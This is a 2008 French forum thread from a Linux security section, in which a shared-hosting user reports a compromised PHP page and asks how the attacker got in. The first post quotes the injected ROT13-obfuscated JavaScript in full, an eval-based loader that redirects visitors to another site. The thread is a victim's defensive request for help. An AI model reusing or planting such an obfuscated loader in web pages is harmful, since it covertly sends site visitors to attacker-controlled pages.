Forum des développeurs  

Le forum de référence en programmation et développement. Articles, cours et tutoriels du débutant au chef de projet et DBA confirmé.
Précédent   Forum des développeurs > Hardware, Systèmes et Logiciels > Linux > Sécurité

Sécurité Vos questions sur la sécurité sous Linux/Unix

Réponse
 
Outils de la discussion
Vieux 28/03/2008, 16h16   #1 (permalink)
Membre éclairé
 
Date d'inscription: octobre 2002
Localisation: Amiens
Âge: 31
Messages: 381
Envoyer un message via ICQ à USA Mike Envoyer un message via MSN à USA Mike
Par défaut faille javascript shapgvba via linux, comment remonter ?

bonjour,

mon serveur web mutualisé a subbi un faille. une page inde.php d'un site a été accédé (on ne sait pas comment) et modifié en ajoutant le code javascritp obstrucé suivant :
Citation:
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=\" HcvfNU)z\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XM q!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.y ratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.l ength;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<S eRJ:1U7#]FT#FGl\an#B#S~Msi$\aUSRel\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\a>< \/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>

Celui-çi, une fois décodé fait une redirection vers un site TOTO.

ce qui me soucie, est comment la personne est entré sur le serveur et a réussi à modifier ce fichier (uniquement celui-là). une idée de comment remonter la trace ?

merci de votre aide.
USA Mike est déconnecté   Envoyer un message privé Réponse avec citation
Vieux 28/03/2008, 16h40   #2 (permalink)
Membre éclairé
 
Date d'inscription: octobre 2002
Localisation: Amiens
Âge: 31
Messages: 381
Envoyer un message via ICQ à USA Mike Envoyer un message via MSN à USA Mike
Par défaut ok

ces 2 sites là m'en disent un peu plus mais pas assez pour que je comprenne :

http://www.pouet.net/topic.php?which...age=1&x=36&y=4

http://forum.ovh.com/showthread.php?t=30550

si ça peut aider...
USA Mike est déconnecté   Envoyer un message privé Réponse avec citation
NEWS LINUX PROFESSIONNELFAQ LINUXTUTORIELS LINUXLIVRES LINUXLINUX TVUNIXGTK+QtAPACHE

Réponse

Précédent   Forum des développeurs > Hardware, Systèmes et Logiciels > Linux > Sécurité



Outils de la discussion

Règles de messages
Vous ne pouvez pas créer de nouvelles discussions
Vous ne pouvez pas envoyer des réponses
Vous ne pouvez pas envoyer des pièces jointes
Vous ne pouvez pas modifier vos messages

Les balises BB sont activées : oui
Les smileys sont activés : oui
La balise [IMG] est activée : oui
Le code HTML peut être employé : non
Trackbacks are non
Pingbacks are non
Refbacks are non
Navigation rapide


Fuseau horaire GMT +1. Il est actuellement 01h02.


Publiez vos articles, tutoriels et cours et rejoignez-nous dans l'équipe de rédaction du club d'entraide des développeurs francophones. Nous contacter
Copyright 2000-2008 www.developpez.com - Legal informations